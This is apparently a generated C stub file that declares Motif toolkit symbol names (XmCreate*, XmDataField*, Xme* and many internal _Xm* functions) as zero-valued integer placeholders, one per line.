int _XmConvertCSToString = 0;
|
||||
int _XmConvertFactor = 0;
|
||||
int _XmConvertFloatUnitsToIntUnits = 0;
|
||||
int _XmConvertHandler = 0;
|
||||
int _XmConvertHandlerSetLocal = 0;
|
||||
int _XmConvertStringToUnits = 0;
|
||||
int XmConvertStringToUnits = 0;
|
||||
int _XmConvertToBW = 0;
|
||||
int _XmConvertUnits = 0;
|
||||
int XmConvertUnits = 0;
|
||||
int _XmCopyCursorIconQuark = 0;
|
||||
int XmCopyISOLatin1Lowered = 0;
|
||||
int _XmCountVaList = 0;
|
||||
int XmCreateArrowButton = 0;
|
||||
int XmCreateArrowButtonGadget = 0;
|
||||
int _XmCreateArrowPixmaps = 0;
|
||||
int XmCreateBulletinBoard = 0;
|
||||
int XmCreateBulletinBoardDialog = 0;
|
||||
int XmCreateButtonBox = 0;
|
||||
int XmCreateCascadeButton = 0;
|
||||
int XmCreateCascadeButtonGadget = 0;
|
||||
int XmCreateColorSelector = 0;
|
||||
int XmCreateColumn = 0;
|
||||
int XmCreateCombinationBox2 = 0;
|
||||
int XmCreateComboBox = 0;
|
||||
int XmCreateCommand = 0;
|
||||
int XmCreateCommandDialog = 0;
|
||||
int XmCreateContainer = 0;
|
||||
int XmCreateDataField = 0;
|
||||
int XmCreateDialogShell = 0;
|
||||
int XmCreateDragIcon = 0;
|
||||
int XmCreateDrawingArea = 0;
|
||||
int XmCreateDrawnButton = 0;
|
||||
int XmCreateDropDown = 0;
|
||||
int XmCreateDropDownComboBox = 0;
|
||||
int XmCreateDropDownList = 0;
|
||||
int XmCreateErrorDialog = 0;
|
||||
int XmCreateExt18List = 0;
|
||||
int XmCreateExtended18List = 0;
|
||||
int XmCreateFileSelectionBox = 0;
|
||||
int XmCreateFileSelectionDialog = 0;
|
||||
int _XmCreateFocusData = 0;
|
||||
int XmCreateFontSelector = 0;
|
||||
int XmCreateForm = 0;
|
||||
int XmCreateFormDialog = 0;
|
||||
int XmCreateFrame = 0;
|
||||
int XmCreateGrabShell = 0;
|
||||
int XmCreateIconBox = 0;
|
||||
int XmCreateIconButton = 0;
|
||||
int XmCreateIconGadget = 0;
|
||||
int XmCreateIconHeader = 0;
|
||||
int XmCreateInformationDialog = 0;
|
||||
int XmCreateLabel = 0;
|
||||
int XmCreateLabelGadget = 0;
|
||||
int XmCreateList = 0;
|
||||
int XmCreateMainWindow = 0;
|
||||
int XmCreateMenuBar = 0;
|
||||
int _XmCreateMenuCursor = 0;
|
||||
int XmCreateMenuShell = 0;
|
||||
int XmCreateMessageBox = 0;
|
||||
int XmCreateMessageDialog = 0;
|
||||
int XmCreateMultiList = 0;
|
||||
int XmCreateNotebook = 0;
|
||||
int XmCreateOptionMenu = 0;
|
||||
int XmCreateOutline = 0;
|
||||
int XmCreatePaned = 0;
|
||||
int XmCreatePanedWindow = 0;
|
||||
int XmCreatePopupMenu = 0;
|
||||
int XmCreatePromptDialog = 0;
|
||||
int XmCreatePulldownMenu = 0;
|
||||
int XmCreatePushButton = 0;
|
||||
int XmCreatePushButtonGadget = 0;
|
||||
int XmCreateQuestionDialog = 0;
|
||||
int XmCreateRadioBox = 0;
|
||||
int _XmCreateRenderTable = 0;
|
||||
int _XmCreateRendition = 0;
|
||||
int XmCreateRowColumn = 0;
|
||||
int XmCreateScale = 0;
|
||||
int XmCreateScrollBar = 0;
|
||||
int XmCreateScrolledList = 0;
|
||||
int XmCreateScrolledText = 0;
|
||||
int XmCreateScrolledWindow = 0;
|
||||
int XmCreateSelectionBox = 0;
|
||||
int XmCreateSelectionDialog = 0;
|
||||
int XmCreateSeparator = 0;
|
||||
int XmCreateSeparatorGadget = 0;
|
||||
int XmCreateSimpleCheckBox = 0;
|
||||
int XmCreateSimpleMenuBar = 0;
|
||||
int XmCreateSimpleOptionMenu = 0;
|
||||
int XmCreateSimplePopupMenu = 0;
|
||||
int XmCreateSimplePulldownMenu = 0;
|
||||
int XmCreateSimpleRadioBox = 0;
|
||||
int XmCreateSimpleSpinBox = 0;
|
||||
int XmCreateSpinBox = 0;
|
||||
int _XmCreateTab = 0;
|
||||
int XmCreateTabBox = 0;
|
||||
int _XmCreateTabList = 0;
|
||||
int XmCreateTabStack = 0;
|
||||
int XmCreateTemplateDialog = 0;
|
||||
int XmCreateText = 0;
|
||||
int XmCreateTextField = 0;
|
||||
int XmCreateToggleButton = 0;
|
||||
int XmCreateToggleButtonGadget = 0;
|
||||
int XmCreateTree = 0;
|
||||
int _XmCreateVisibilityRect = 0;
|
||||
int XmCreateWarningDialog = 0;
|
||||
int XmCreateWorkArea = 0;
|
||||
int XmCreateWorkingDialog = 0;
|
||||
int XmCvtByteStreamToXmString = 0;
|
||||
int XmCvtCTToXmString = 0;
|
||||
int XmCvtFromHorizontalPixels = 0;
|
||||
int XmCvtFromVerticalPixels = 0;
|
||||
int XmCvtStringToUnitType = 0;
|
||||
int XmCvtTextPropertyToXmStringTable = 0;
|
||||
int XmCvtTextToXmString = 0;
|
||||
int XmCvtToHorizontalPixels = 0;
|
||||
int XmCvtToVerticalPixels = 0;
|
||||
int XmCvtXmStringTableToTextProperty = 0;
|
||||
int XmCvtXmStringToByteStream = 0;
|
||||
int _XmCvtXmStringToCT = 0;
|
||||
int XmCvtXmStringToCT = 0;
|
||||
int XmCvtXmStringToText = 0;
|
||||
int _XmCvtXmStringToUTF8String = 0;
|
||||
int XmCvtXmStringToUTF8String = 0;
|
||||
int _XmDataF_EventBindings1 = 0;
|
||||
int _XmDataF_EventBindings2 = 0;
|
||||
int _XmDataF_EventBindings3 = 0;
|
||||
int _XmDataF_EventBindings4 = 0;
|
||||
int xmDataFieldClassRec = 0;
|
||||
int _XmDataFieldConvert = 0;
|
||||
int XmDataFieldCopy = 0;
|
||||
int _XmDataFieldCountBytes = 0;
|
||||
int XmDataFieldCut = 0;
|
||||
int _XmDataFieldDeselectSelection = 0;
|
||||
int XmDataFielddf_ClearSelection = 0;
|
||||
int _XmDataFielddf_SetCursorPosition = 0;
|
||||
int XmDataFielddf_SetCursorPosition = 0;
|
||||
int _XmDataFielddf_SetDestination = 0;
|
||||
int _XmDataFieldDrawInsertionPoint = 0;
|
||||
int XmDataFieldGetAddMode = 0;
|
||||
int XmDataFieldGetBaseline = 0;
|
||||
int XmDataFieldGetCursorPosition = 0;
|
||||
int _XmDataFieldGetDropReciever = 0;
|
||||
int XmDataFieldGetEditable = 0;
|
||||
int XmDataFieldGetInsertionPosition = 0;
|
||||
int XmDataFieldGetLastPosition = 0;
|
||||
int XmDataFieldGetMaxLength = 0;
|
||||
int XmDataFieldGetSelection = 0;
|
||||
int XmDataFieldGetSelectionPosition = 0;
|
||||
int XmDataFieldGetSelectionWcs = 0;
|
||||
int XmDataFieldGetString = 0;
|
||||
int XmDataFieldGetStringWcs = 0;
|
||||
int XmDataFieldGetSubstring = 0;
|
||||
int XmDataFieldGetSubstringWcs = 0;
|
||||
int XmDataFieldInsert = 0;
|
||||
int XmDataFieldInsertWcs = 0;
|
||||
int _XmDataFieldLoseSelection = 0;
|
||||
int XmDataFieldPaste = 0;
|
||||
int XmDataFieldPosToXY = 0;
|
||||
int XmDataFieldRemove = 0;
|
||||
int XmDataFieldReplace = 0;
|
||||
int _XmDataFieldReplaceText = 0;
|
||||
int XmDataFieldReplaceWcs = 0;
|
||||
int XmDataFieldSetAddMode = 0;
|
||||
int _XmDataFieldSetClipRect = 0;
|
||||
int XmDataFieldSetEditable = 0;
|
||||
int XmDataFieldSetHighlight = 0;
|
||||
int XmDataFieldSetInsertionPosition = 0;
|
||||
int XmDataFieldSetMaxLength = 0;
|
||||
int _XmDataFieldSetSel2 = 0;
|
||||
int XmDataFieldSetSelection = 0;
|
||||
int XmDataFieldSetString = 0;
|
||||
int XmDataFieldShowPosition = 0;
|
||||
int _XmDataFieldStartSelection = 0;
|
||||
int xmDataFieldWidgetClass = 0;
|
||||
int XmDataFieldXYToPos = 0;
|
||||
int _XmDataFPrimClassExtRec = 0;
|
||||
int _XmDataFToggleCursorGC = 0;
|
||||
int XmDeactivateProtocol = 0;
|
||||
int _XmDefaultColorObj = 0;
|
||||
int _XmDefaultDragIconQuark = 0;
|
||||
int _XmdefaultTextActionsTable = 0;
|
||||
int _XmdefaultTextActionsTableSize = 0;
|
||||
int _XmDefaultVisualResources = 0;
|
||||
int xmDesktopClass = 0;
|
||||
int xmDesktopClassRec = 0;
|
||||
int xmDesktopObjectClass = 0;
|
||||
int _XmDestinationHandler = 0;
|
||||
int _XmDestroyDefaultDragIcon = 0;
|
||||
int _XmDestroyFocusData = 0;
|
||||
int _XmDestroyMotifWindow = 0;
|
||||
int _XmDestroyParentCallback = 0;
|
||||
int XmDestroyPixmap = 0;
|
||||
int _XmDestroyTearOffShell = 0;
|
||||
int xmDialogShellClassRec = 0;
|
||||
int xmDialogShellExtClassRec = 0;
|
||||
int xmDialogShellExtObjectClass = 0;
|
||||
int xmDialogShellWidgetClass = 0;
|
||||
int _XmDifferentBackground = 0;
|
||||
int _XmDirectionDefault = 0;
|
||||
int XmDirectionMatch = 0;
|
||||
int XmDirectionMatchPartial = 0;
|
||||
int XmDirectionToStringDirection = 0;
|
||||
int _XmDismissTearOff = 0;
|
||||
int _XmDispatchGadgetInput = 0;
|
||||
int _XmDisplay_baseTranslations = 0;
|
||||
int xmDisplayClass = 0;
|
||||
int xmDisplayClassRec = 0;
|
||||
int xmDisplayObjectClass = 0;
|
||||
int _XmDoGadgetTraversal = 0;
|
||||
int XmDragCancel = 0;
|
||||
int _XmDragC_defaultTranslations = 0;
|
||||
int xmDragContextClass = 0;
|
||||
int xmDragContextClassRec = 0;
|
||||
int xmDragIconClassRec = 0;
|
||||
int _XmDragIconClean = 0;
|
||||
int _XmDragIconIsDirty = 0;
|
||||
int xmDragIconObjectClass = 0;
|
||||
int _XmDragOverChange = 0;
|
||||
int _XmDragOverFinish = 0;
|
||||
int _XmDragOverGetActiveCursor = 0;
|
||||
int _XmDragOverHide = 0;
|
||||
int _XmDragOverMove = 0;
|
||||
int _XmDragOverSetInitialPosition = 0;
|
||||
int xmDragOverShellClassRec = 0;
|
||||
int xmDragOverShellWidgetClass = 0;
|
||||
int _XmDragOverShow = 0;
|
||||
int XmDragStart = 0;
|
||||
int _XmDragUnderAnimation = 0;
|
||||
int _XmDrawArrow = 0;
|
||||
int XmDrawBevel = 0;
|
||||
int _XmDrawBorder = 0;
|
||||
int _XmDrawDiamond = 0;
|
||||
int _XmDrawDiamondButton = 0;
|
||||
int _XmDrawHighlight = 0;
|
||||
int _XmDrawingA_defaultTranslations = 0;
|
||||
int xmDrawingAreaClassRec = 0;
|
||||
int _XmDrawingAreaInput = 0;
|
||||
int xmDrawingAreaWidgetClass = 0;
|
||||
int _XmDrawingA_traversalTranslations = 0;
|
||||
int _XmDrawnB_defaultTranslations = 0;
|
||||
int _XmDrawnB_menuTranslations = 0;
|
||||
int _XmDrawnBPrimClassExtRec = 0;
|
||||
int xmDrawnButtonClassRec = 0;
|
||||
int xmDrawnButtonWidgetClass = 0;
|
||||
int _XmDrawSeparator = 0;
|
||||
int _XmDrawShadow = 0;
|
||||
int _XmDrawShadows = 0;
|
||||
int _XmDrawShadowType = 0;
|
||||
int _XmDrawSimpleHighlight = 0;
|
||||
int _XmDrawSquareButton = 0;
|
||||
int xmDropDownClassRec = 0;
|
||||
int XmDropDownGetArrow = 0;
|
||||
int XmDropDownGetChild = 0;
|
||||
int XmDropDownGetLabel = 0;
|
||||
int XmDropDownGetList = 0;
|
||||
int XmDropDownGetText = 0;
|
||||
int XmDropDownGetValue = 0;
|
||||
int xmDropDownWidgetClass = 0;
|
||||
int XmDropSiteConfigureStackingOrder = 0;
|
||||
int XmDropSiteEndUpdate = 0;
|
||||
int XmDropSiteGetActiveVisuals = 0;
|
||||
int xmDropSiteManagerClassRec = 0;
|
||||
int xmDropSiteManagerObjectClass = 0;
|
||||
int XmDropSiteQueryStackingOrder = 0;
|
||||
int XmDropSiteRegister = 0;
|
||||
int XmDropSiteRegistered = 0;
|
||||
int XmDropSiteRetrieve = 0;
|
||||
int _XmDropSiteShell = 0;
|
||||
int XmDropSiteStartUpdate = 0;
|
||||
int XmDropSiteUnregister = 0;
|
||||
int XmDropSiteUpdate = 0;
|
||||
int _XmDropSiteWrapperCandidate = 0;
|
||||
int XmDropTransferAdd = 0;
|
||||
int xmDropTransferClassRec = 0;
|
||||
int xmDropTransferObjectClass = 0;
|
||||
int XmDropTransferStart = 0;
|
||||
int _XmDSIAddChild = 0;
|
||||
int _XmDSIDestroy = 0;
|
||||
int _XmDSIGetBorderWidth = 0;
|
||||
int _XmDSIGetChildPosition = 0;
|
||||
int _XmDSIRemoveChild = 0;
|
||||
int _XmDSIReplaceChild = 0;
|
||||
int _XmDSISwapChildren = 0;
|
||||
int _XmDSMGetTreeFromDSM = 0;
|
||||
int _XmDSMUpdate = 0;
|
||||
int _XmDSResources = 0;
|
||||
int XmeAddFocusChangeCallback = 0;
|
||||
int XmeClearBorder = 0;
|
||||
int XmeClipboardSink = 0;
|
||||
int XmeClipboardSource = 0;
|
||||
int XmeConfigureObject = 0;
|
||||
int XmeConvertMerge = 0;
|
||||
int XmeCountVaListSimple = 0;
|
||||
int XmeCreateClassDialog = 0;
|
||||
int _XmEditResCheckMessages = 0;
|
||||
int XmeDragSource = 0;
|
||||
int XmeDrawArrow = 0;
|
||||
int XmeDrawCircle = 0;
|
||||
int XmeDrawDiamond = 0;
|
||||
int XmeDrawHighlight = 0;
|
||||
int XmeDrawIndicator = 0;
|
||||
int XmeDrawPolygonShadow = 0;
|
||||
int XmeDrawSeparator = 0;
|
||||
int XmeDrawShadows = 0;
|
||||
int XmeDropSink = 0;
|
||||
int XmeFlushIconFileCache = 0;
|
||||
int XmeFocusIsInShell = 0;
|
||||
int XmeFromHorizontalPixels = 0;
|
||||
int XmeFromVerticalPixels = 0;
|
||||
int XmeGetColorObjData = 0;
|
||||
int XmeGetDefaultPixel = 0;
|
||||
int XmeGetDefaultRenderTable = 0;
|
||||
int XmeGetDesktopColorCells = 0;
|
||||
int XmeGetDirection = 0;
|
||||
int XmeGetEncodingAtom = 0;
|
||||
int XmeGetHomeDirName = 0;
|
||||
int XmeGetIconControlInfo = 0;
|
||||
int XmeGetLocalizedString = 0;
|
||||
int XmeGetMask = 0;
|
||||
int XmeGetNextCharacter = 0;
|
||||
int XmeGetNullCursor = 0;
|
||||
int XmeGetPixelData = 0;
|
||||
int XmeGetPixmapData = 0;
|
||||
int XmeGetTextualDragIcon = 0;
|
||||
int XmeMicroSleep = 0;
|
||||
int _XmEmptyRect = 0;
|
||||
int XmeNamedSink = 0;
|
||||
int XmeNamedSource = 0;
|
||||
int XmeNamesAreEqual = 0;
|
||||
int XmeNavigChangeManaged = 0;
|
||||
int _XmEnterGadget = 0;
|
||||
int _XmEnterRowColumn = 0;
|
||||
int _XmEntryByteCountGet = 0;
|
||||
int _XmEntryCacheGet = 0;
|
||||
int _XmEntryCharCountGet = 0;
|
||||
int _XmEntryDirectionGet = 0;
|
||||
int _XmEntryDirectionSet = 0;
|
||||
int _XmEntryPopGet = 0;
|
||||
int _XmEntryPushGet = 0;
|
||||
int _XmEntryRendBeginCountGet = 0;
|
||||
int _XmEntryRendBeginGet = 0;
|
||||
int _XmEntryRendBeginSet = 0;
|
||||
int _XmEntryRendEndCountGet = 0;
|
||||
int _XmEntryRendEndGet = 0;
|
||||
int _XmEntryRendEndSet = 0;
|
||||
int _XmEntryTabsGet = 0;
|
||||
int _XmEntryTag = 0;
|
||||
int _XmEntryTagSet = 0;
|
||||
int _XmEntryTextGet = 0;
|
||||
int _XmEntryTextSet = 0;
|
||||
int _XmEntryTextTypeGet = 0;
|
||||
int XmeParseUnits = 0;
|
||||
int XmePrimarySink = 0;
|
||||
int XmePrimarySource = 0;
|
||||
int XmeQueryBestCursorSize = 0;
|
||||
int _XmEraseShadow = 0;
|
||||
int XmeRedisplayGadgets = 0;
|
||||
int XmeRemoveFocusChangeCallback = 0;
|
||||
int XmeRenderTableGetDefaultFont = 0;
|
||||
int XmeReplyToQueryGeometry = 0;
|
||||
int XmeResolvePartOffsets = 0;
|
||||
int XmeSecondarySink = 0;
|
||||
int XmeSecondarySource = 0;
|
||||
int XmeSecondaryTransfer = 0;
|
||||
int XmeSetWMShellTitle = 0;
|
||||
int XmeStandardConvert = 0;
|
||||
int XmeStandardTargets = 0;
|
||||
int XmeStringGetComponent = 0;
|
||||
int XmeStringIsValid = 0;
|
||||
int XmeToHorizontalPixels = 0;
|
||||
int XmeToVerticalPixels = 0;
|
||||
int XmeTraitGet = 0;
|
||||
int XmeTraitSet = 0;
|
||||
int XmeTransferAddDoneProc = 0;
|
||||
int XmeUseColorObj = 0;
|
||||
int XmeVirtualToActualKeysyms = 0;
|
||||
int XmeVLCreateWidget = 0;
|
||||
int XmeWarning = 0;
|
||||
int XME_WARNING = 0;
|
||||
int XmeXpmAttributesSize = 0;
|
||||
int XmeXpmCreateBufferFromImage = 0;
|
||||
int XmeXpmCreateBufferFromPixmap = 0;
|
||||
int XmeXpmCreateBufferFromXpmImage = 0;
|
||||
int XmeXpmCreateDataFromImage = 0;
|
||||
int XmeXpmCreateDataFromPixmap = 0;
|
||||
int XmeXpmCreateDataFromXpmImage = 0;
|
||||
int XmeXpmCreateImageFromBuffer = 0;
|
||||
int XmeXpmCreateImageFromData = 0;
|
||||
int XmeXpmCreateImageFromXpmImage = 0;
|
||||
int XmeXpmCreatePixmapFromBuffer = 0;
|
||||
int XmeXpmCreatePixmapFromData = 0;
|
||||
int XmeXpmCreatePixmapFromXpmImage = 0;
|
||||
int XmeXpmCreateXpmImageFromBuffer = 0;
|
||||
int XmeXpmCreateXpmImageFromData = 0;
|
||||
int XmeXpmCreateXpmImageFromImage = 0;
|
||||
int XmeXpmCreateXpmImageFromPixmap = 0;
|
||||
int XmeXpmFree = 0;
|
||||
int XmeXpmFreeAttributes = 0;
|
||||
int XmeXpmFreeExtensions = 0;
|
||||
int XmeXpmFreeXpmImage = 0;
|
||||
int XmeXpmFreeXpmInfo = 0;
|
||||
int XmeXpmGetErrorString = 0;
|
||||
int XmeXpmLibraryVersion = 0;
|
||||
int XmeXpmReadFileToBuffer = 0;
|
||||
int XmeXpmReadFileToData = 0;
|
||||
int XmeXpmReadFileToImage = 0;
|
||||
int XmeXpmReadFileToPixmap = 0;
|
||||
int XmeXpmReadFileToXpmImage = 0;
|
||||
int XmeXpmWriteFileFromBuffer = 0;
|
||||
int XmeXpmWriteFileFromData = 0;
|
||||
int XmeXpmWriteFileFromImage = 0;
|
||||
int XmeXpmWriteFileFromPixmap = 0;
|
||||
int XmeXpmWriteFileFromXpmImage = 0;
|
||||
int xmExt18ListClassRec = 0;
|
||||
int XmExt18ListDeselectItems = 0;
|
||||
int XmExt18ListDeselectRow = 0;
|
||||
int XmExt18ListGetSelectedRowArray = 0;
|
||||
int XmExt18ListGetSelectedRows = 0;
|
||||
int XmExt18ListMakeRowVisible = 0;
|
||||
int XmExt18ListSelectAllItems = 0;
|
||||
int XmExt18ListSelectItems = 0;
|
||||
int XmExt18ListSelectRow = 0;
|
||||
int XmExt18ListToggleRow = 0;
|
||||
int XmExt18ListUnselectAllItems = 0;
|
||||
int XmExt18ListUnselectItem = 0;
|
||||
int xmExt18ListWidgetClass = 0;
|
||||
int xmExtClassRec = 0;
|
||||
int _XmExtGetValuesHook = 0;
|
||||
int _XmExtHighlightBorder = 0;
|
||||
int _XmExtImportArgs = 0;
|
||||
int _XmExtObjAlloc = 0;
|
||||
int xmExtObjectClass = 0;
|
||||
int _XmExtObjFree = 0;
|
||||
int _XmExtUnhighlightBorder = 0;
|
||||
int _Xm_fastPtr = 0;
|
||||
int _XmFastSubclassInit = 0;
|
||||
int _XmFileSBGeoMatrixCreate = 0;
|
||||
int xmFileSelectionBoxClassRec = 0;
|
||||
int _XmFileSelectionBoxCreateDirList = 0;
|
||||
int _XmFileSelectionBoxCreateDirListLabel = 0;
|
||||
int _XmFileSelectionBoxCreateFilterLabel = 0;
|
||||
int _XmFileSelectionBoxCreateFilterText = 0;
|
||||
int _XmFileSelectionBoxFocusMoved = 0;
|
||||
int XmFileSelectionBoxGetChild = 0;
|
||||
int _XmFileSelectionBoxGetDirectory = 0;
|
||||
int _XmFileSelectionBoxGetDirListItemCount = 0;
|
||||
int _XmFileSelectionBoxGetDirListItems = 0;
|
||||
int _XmFileSelectionBoxGetDirListLabelString = 0;
|
||||
int _XmFileSelectionBoxGetDirMask = 0;
|
||||
int _XmFileSelectionBoxGetFilterLabelString = 0;
|
||||
int _XmFileSelectionBoxGetListItemCount = 0;
|
||||
int _XmFileSelectionBoxGetListItems = 0;
|
||||
int _XmFileSelectionBoxGetNoMatchString = 0;
|
||||
int _XmFileSelectionBoxGetPattern = 0;
|
||||
int _XmFileSelectionBoxNoGeoRequest = 0;
|
||||
int _XmFileSelectionBoxRestore = 0;
|
||||
int _XmFileSelectionBoxUpOrDown = 0;
|
||||
int xmFileSelectionBoxWidgetClass = 0;
|
||||
int XmFileSelectionDoSearch = 0;
|
||||
int _XmFilterArgs = 0;
|
||||
int _XmFilterResources = 0;
|
||||
int _XmFindNextTabGroup = 0;
|
||||
int _XmFindPrevTabGroup = 0;
|
||||
int _XmFindTabGroup = 0;
|
||||
int _XmFindTopMostShell = 0;
|
||||
int _XmFindTraversablePrim = 0;
|
||||
int _XmFocusInGadget = 0;
|
||||
int _XmFocusIsHere = 0;
|
||||
int _XmFocusIsInShell = 0;
|
||||
int _XmFocusModelChanged = 0;
|
||||
int _XmFocusOutGadget = 0;
|
||||
int XmFontListAdd = 0;
|
||||
int XmFontListAppendEntry = 0;
|
||||
int XmFontListCopy = 0;
|
||||
int XmFontListCreate = 0;
|
||||
int XmFontListCreate_r = 0;
|
||||
int XmFontListEntryCreate = 0;
|
||||
int XmFontListEntryCreate_r = 0;
|
||||
int XmFontListEntryFree = 0;
|
||||
int XmFontListEntryGetFont = 0;
|
||||
int XmFontListEntryGetTag = 0;
|
||||
int XmFontListEntryLoad = 0;
|
||||
int XmFontListFree = 0;
|
||||
int XmFontListFreeFontContext = 0;
|
||||
int _XmFontListGetDefaultFont = 0;
|
||||
int XmFontListGetNextFont = 0;
|
||||
int XmFontListInitFontContext = 0;
|
||||
int XmFontListNextEntry = 0;
|
||||
int XmFontListRemoveEntry = 0;
|
||||
int _XmFontListSearch = 0;
|
||||
int xmFontSelectorClassRec = 0;
|
||||
int xmFontSelectorWidgetClass = 0;
|
||||
int _XmForegroundColorDefault = 0;
|
||||
int xmFormClassRec = 0;
|
||||
int xmFormWidgetClass = 0;
|
||||
int xmFrameClassRec = 0;
|
||||
int _XmFrame_defaultTranslations = 0;
|
||||
int xmFrameWidgetClass = 0;
|
||||
int _XmFreeDragReceiverInfo = 0;
|
||||
int _XmFreeHashTable = 0;
|
||||
int _XmFreeMotifAtom = 0;
|
||||
int _XmFreeScratchPixmap = 0;
|
||||
int _XmFreeTravGraph = 0;
|
||||
int _XmFreeWidgetExtData = 0;
|
||||
int _XmFromHorizontalPixels = 0;
|
||||
int _XmFromLayoutDirection = 0;
|
||||
int _XmFromPanedPixels = 0;
|
||||
int _XmFromVerticalPixels = 0;
|
||||
int _XmGadClassExtRec = 0;
|
||||
int _XmGadgetActivate = 0;
|
||||
int _XmGadgetArm = 0;
|
||||
int _XmGadgetButtonMotion = 0;
|
||||
int xmGadgetClass = 0;
|
||||
int xmGadgetClassRec = 0;
|
||||
int _XmGadgetDrag = 0;
|
||||
int _XmGadgetGetValuesHook = 0;
|
||||
int _XmGadgetImportArgs = 0;
|
||||
int _XmGadgetImportSecondaryArgs = 0;
|
||||
int _XmGadgetKeyInput = 0;
|
||||
int _XmGadgetMultiActivate = 0;
|
||||
int _XmGadgetMultiArm = 0;
|
||||
int _XmGadgetSelect = 0;
|
||||
int _XmGadgetTraverseCurrent = 0;
|
||||
int _XmGadgetTraverseDown = 0;
|
||||
int _XmGadgetTraverseHome = 0;
|
||||
int _XmGadgetTraverseLeft = 0;
|
||||
int _XmGadgetTraverseNext = 0;
|
||||
int _XmGadgetTraverseNextTabGroup = 0;
|
||||
int _XmGadgetTraversePrev = 0;
|
||||
int _XmGadgetTraversePrevTabGroup = 0;
|
||||
int _XmGadgetTraverseRight = 0;
|
||||
int _XmGadgetTraverseUp = 0;
|
||||
int _XmGadgetWarning = 0;
|
||||
int _XmGeoAdjustBoxes = 0;
|
||||
int _XmGeoArrangeBoxes = 0;
|
||||
int _XmGeoBoxesSameHeight = 0;
|
||||
int _XmGeoBoxesSameWidth = 0;
|
||||
int _XmGeoClearRectObjAreas = 0;
|
||||
int _XmGeoCount_kids = 0;
|
||||
int _XmGeoGetDimensions = 0;
|
||||
int _XmGeoLoadValues = 0;
|
||||
int _XmGeoMatrixAlloc = 0;
|
||||
int _XmGeoMatrixFree = 0;
|
||||
int _XmGeoMatrixGet = 0;
|
||||
int _XmGeoMatrixSet = 0;
|
||||
int _XmGeometryEqual = 0;
|
||||
int _XmGeoReplyYes = 0;
|
||||
int _XmGeoSetupKid = 0;
|
||||
int _XmGetActiveDropSite = 0;
|
||||
int _XmGetActiveItem = 0;
|
||||
int _XmGetActiveProtocolStyle = 0;
|
||||
int _XmGetActiveTabGroup = 0;
|
||||
int _XmGetActiveTopLevelMenu = 0;
|
||||
int _XmGetActualClass = 0;
|
||||
int _XmGetArrowDrawRects = 0;
|
||||
int XmGetAtomName = 0;
|
||||
int _XmGetAudibleWarning = 0;
|
||||
int _XmGetBGPixmapName = 0;
|
||||
int _XmGetBitmapConversionModel = 0;
|
||||
int _XmGetBottomShadowColor = 0;
|
||||
int _XmGetClassExtensionPtr = 0;
|
||||
int _XmGetColorAllocationProc = 0;
|
||||
int XmGetColorCalculation = 0;
|
||||
int _XmGetColorCalculationProc = 0;
|
||||
int _XmGetColoredPixmap = 0;
|
||||
int _XmGetColors = 0;
|
||||
int XmGetColors = 0;
|
||||
int _XmGetDefaultBackgroundColorSpec = 0;
|
||||
int _XmGetDefaultColors = 0;
|
||||
int _XmGetDefaultDisplay = 0;
|
||||
int _XmGetDefaultFontList = 0;
|
||||
int _XmGetDefaultThresholdsForScreen = 0;
|
||||
int _XmGetDefaultTime = 0;
|
||||
int XmGetDestination = 0;
|
||||
int _XmGetDisplayObject = 0;
|
||||
int XmGetDragContext = 0;
|
||||
int _XmGetDragContextFromHandle = 0;
|
||||
int _XmGetDragCursorCachePtr = 0;
|
||||
int _XmGetDragProtocolStyle = 0;
|
||||
int _XmGetDragProxyWindow = 0;
|
||||
int _XmGetDragReceiverInfo = 0;
|
||||
int _XmGetDropSiteManagerObject = 0;
|
||||
int _XmGetEffectiveView = 0;
|
||||
int _XmGetEncodingRegistryTarget = 0;
|
||||
int _XmGetFirstFocus = 0;
|
||||
int _XmGetFirstFont = 0;
|
||||
int _XmGetFocus = 0;
|
||||
int _XmGetFocusData = 0;
|
||||
int _XmGetFocusFlag = 0;
|
||||
int _XmGetFocusPolicy = 0;
|
||||
int _XmGetFocusResetFlag = 0;
|
||||
int XmGetFocusWidget = 0;
|
||||
int _XmGetFontUnit = 0;
|
||||
int _XmGetHashEntryIterate = 0;
|
||||
int _XmGetHighlightColor = 0;
|
||||
int _XmGetIconControlInfo = 0;
|
||||
int XmGetIconFileName = 0;
|
||||
int _XmGetIconPixmapName = 0;
|
||||
int _XmGetImage = 0;
|
||||
int _XmGetImageAndHotSpotFromFile = 0;
|
||||
int _XmGetImageFromFile = 0;
|
||||
int _XmGetInDragMode = 0;
|
||||
int _XmGetInsensitiveStippleBitmap = 0;
|
||||
int _XmGetKidGeo = 0;
|
||||
int _XmGetLayoutDirection = 0;
|
||||
int _XmGetManagedInfo = 0;
|
||||
int _XmGetMaxCursorSize = 0;
|
||||
int _XmGetMBStringFromXmString = 0;
|
||||
int XmGetMenuCursor = 0;
|
||||
int _XmGetMenuCursorByScreen = 0;
|
||||
int _XmGetMenuProcContext = 0;
|
||||
int _XmGetMenuState = 0;
|
||||
int _XmGetMotifAtom = 0;
|
||||
int _XmGetMoveOpaqueByScreen = 0;
|
||||
int _XmGetNavigability = 0;
|
||||
int _XmGetNavigationType = 0;
|
||||
int _Xm_GetNewElement = 0;
|
||||
int XmGetNewPictureState = 0;
|
||||
int _XmGetNullCursor = 0;
|
||||
int _XmGetPixelData = 0;
|
||||
int _XmGetPixmap = 0;
|
||||
int XmGetPixmap = 0;
|
||||
int _XmGetPixmapBasedGC = 0;
|
||||
int XmGetPixmapByDepth = 0;
|
||||
int _XmGetPixmapData = 0;
|
||||
int _XmGetPointVisibility = 0;
|
||||
int _XmGetPopupMenuClick = 0;
|
||||
int XmGetPostedFromWidget = 0;
|
||||
int _XmGetRC_PopupPosted = 0;
|
||||
int _XmGetRealXlations = 0;
|
||||
int _XmGetScaledPixmap = 0;
|
||||
int XmGetScaledPixmap = 0;
|
||||
int _XmGetScreenObject = 0;
|
||||
int XmGetSecondaryResourceData = 0;
|
||||
int _XmGetTabGroup = 0;
|
||||
int XmGetTabGroup = 0;
|
||||
int XmGetTearOffControl = 0;
|
||||
int _XmGetTextualDragIcon = 0;
|
||||
int XmGetToolTipString = 0;
|
||||
int _XmGetTopShadowColor = 0;
|
||||
int _XmGetTransientFlag = 0;
|
||||
int _XmGetUnitType = 0;
|
||||
int _XmGetUnpostBehavior = 0;
|
||||
int XmGetVisibility = 0;
|
||||
int _XmGetWidgetExtData = 0;
|
||||
int _XmGetWidgetNavigPtrs = 0;
|
||||
int _XmGetWorldObject = 0;
|
||||
int _XmGetWrapperData = 0;
|
||||
int XmGetXmDisplay = 0;
|
||||
int _XmGetXmDisplayClass = 0;
|
||||
int XmGetXmScreen = 0;
|
||||
